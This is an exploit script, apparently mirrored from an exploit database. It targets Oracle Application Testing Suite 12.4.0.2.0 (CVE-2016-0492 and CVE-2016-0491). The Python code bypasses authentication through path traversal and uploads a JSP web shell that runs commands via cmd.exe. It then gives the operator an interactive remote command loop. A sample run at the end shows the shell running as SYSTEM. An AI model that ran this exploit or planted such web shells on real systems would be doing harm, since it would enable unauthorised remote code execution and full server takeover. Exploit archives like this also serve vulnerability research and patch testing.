PageRenderTime 49ms CodeModel.GetById 21ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/jsp/webapps/39691.py

https://bitbucket.org/DinoRex99/exploit-database
Python | 105 lines | 93 code | 4 blank | 8 comment | 0 complexity | 25b33982e8d82ca5cc530ff6974869e9 MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. # Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit

    2. 

  2. # Exploit Author: Zhou Yu <504137480@qq.com >

    3. 

  3. # Vendor Homepage: http://www.oracle.com/

    4. 

  4. # Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn

    5. 

  5. # Version: 12.4.0.2.0

    6. 

  6. # Tested on: Win7 SP1 32-bit

    7. 

  7. # CVE : CVE-2016-0492 and CVE-2016-0491

    8. 

  8. 

    9. 

  9. import urllib2

    10. 

  10. import urllib

    11. 

  11. 

    12. 

  12. ip = '192.168.150.239'

    13. 

  13. port = 8088

    14. 

  14. 

    15. 

  15. url = "http://" + ip + ":" + str(port)

    16. 

  16. #bypass authentication

    17. 

  17. url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"

    18. 

  18. request = urllib2.Request(url)

    19. 

  19. 

    20. 

  20. webshell_content='''

    21. 

  21. <%@ page import="java.util.*,java.io.*"  %>

    22. 

  22.     <%

    23. 

  23.         if (request.getParameter("{cmd}") != null) {{

    24. 

  24.             Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));

    25. 

  25.             OutputStream os = p.getOutputStream();

    26. 

  26.             InputStream in = p.getInputStream();

    27. 

  27.             DataInputStream dis = new DataInputStream(in);

    28. 

  28.             String disr = dis.readLine();

    29. 

  29.             while (disr != null) {{

    30. 

  30.                 out.println(disr);

    31. 

  31.                 disr = dis.readLine();

    32. 

  32.             }}

    33. 

  33.         }}

    34. 

  34.     %>

    35. 

  35. '''

    36. 

  36. boundary = "---------------------------7e01e2240a1e"

    37. 

  37. request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)

    38. 

  38. post_data = "--" + boundary + "\r\n"

    39. 

  39. post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"

    40. 

  40. post_data = post_data + "\r\n.jsp\r\n"

    41. 

  41. post_data = post_data + "--" + boundary + "\r\n"

    42. 

  42. post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"

    43. 

  43. post_data = post_data + "\r\nwebshell.jsp\r\n"

    44. 

  44. post_data = post_data + "--" + boundary + "\r\n"

    45. 

  45. post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"

    46. 

  46. post_data = post_data + "\r\n\r\n"

    47. 

  47. post_data = post_data + "--" + boundary + "\r\n"

    48. 

  48. post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"

    49. 

  49. post_data = post_data + "\r\n\r\n"

    50. 

  50. post_data = post_data + "--" + boundary + "\r\n"

    51. 

  51. post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"

    52. 

  52. post_data = post_data + "\r\n\r\n"

    53. 

  53. post_data = post_data + "--" + boundary + "\r\n"

    54. 

  54. post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"

    55. 

  55. post_data = post_data + "\r\n*\r\n"

    56. 

  56. post_data = post_data + "--" + boundary + "\r\n"

    57. 

  57. post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"

    58. 

  58. post_data = post_data + "Content-Type: text/plain\r\n"

    59. 

  59. post_data = post_data + "\r\n" + webshell_content +"\r\n"

    60. 

  60. post_data = post_data + "--" + boundary + "\r\n"

    61. 

  61. post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"

    62. 

  62. post_data = post_data + "\r\nDefault\r\n"

    63. 

  63. post_data = post_data + "--" + boundary + "\r\n"

    64. 

  64. post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"

    65. 

  65. post_data = post_data + "\r\n.\r\n"

    66. 

  66. post_data = post_data + "--" + boundary + "\r\n"

    67. 

  67. post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"

    68. 

  68. post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"

    69. 

  69. post_data = post_data + "--" + boundary + "--"+"\r\n"

    70. 

  70. 

    71. 

  71. try:

    72. 

  72.     request.add_data(post_data)

    73. 

  73.     response = urllib2.urlopen(request)

    74. 

  74.     if response.code == 200 :

    75. 

  75.         print "[+]upload done!"

    76. 

  76.         webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"

    77. 

  77.         print "[+]wait a moment,detecting whether the webshell exists..."

    78. 

  78.         if urllib2.urlopen(webshellurl).code == 200 :

    79. 

  79.             print "[+]upload webshell successfully!"

    80. 

  80.             print "[+]return a cmd shell"

    81. 

  81.             while True:

    82. 

  82.                 cmd = raw_input(">>: ")

    83. 

  83.                 if cmd == "exit" :

    84. 

  84.                     break

    85. 

  85.                 print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()

    86. 

  86.         else:

    87. 

  87.             print "[-]attack fail!"

    88. 

  88.     else:

    89. 

  89.         print "[-]attack fail!"

    90. 

  90. except Exception as e:

    91. 

  91.     print "[-]attack fail!"

    92. 

  92. 

    93. 

  93. '''

    94. 

  94. #run the exploit and get a cmd shell

    95. 

  95. root@kali:~/Desktop# python exploit.py 

    96. 

  96. [+]upload done!

    97. 

  97. [+]wait a moment,detecting whether the webshell exists...

    98. 

  98. [+]upload webshell successfully!

    99. 

  99. [+]return a cmd shell

    100. 

  100. >>: whoami

    101. 

  101. nt authority\system

    102. 

  102. 

    103. 

  103. 

    104. 

  104. >>: exit

    105. 

  105. '''
    106.